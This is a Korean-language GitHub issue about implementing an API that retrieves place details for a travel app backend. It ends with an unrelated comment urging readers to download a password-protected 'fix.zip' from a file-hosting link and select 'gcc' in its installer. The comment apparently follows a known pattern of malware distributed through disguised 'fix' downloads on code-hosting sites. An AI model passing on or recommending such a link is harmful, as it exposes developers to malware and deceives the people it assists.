### ISSUE TITLE
[FEAT] 장소 세부 정보 얻어오는 api 구현

### ISSUE THREAD

**Issue by pyoya1123** [MTVS-Noblesse/Triplay-backend#13]
# ✅기능 이슈

## Description

> 장소 세부 정보 얻어오는 api 구현

<br>

## To Do

- [x] 장소 세부 정보 얻어오는 api 구현

<br>

## ETC

> 기타사항
임시로 넣어놓는거임. 이 컨트롤러 통해서 요청 안하면 장소 세부 정보를 못 갖고옴.
<br>

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
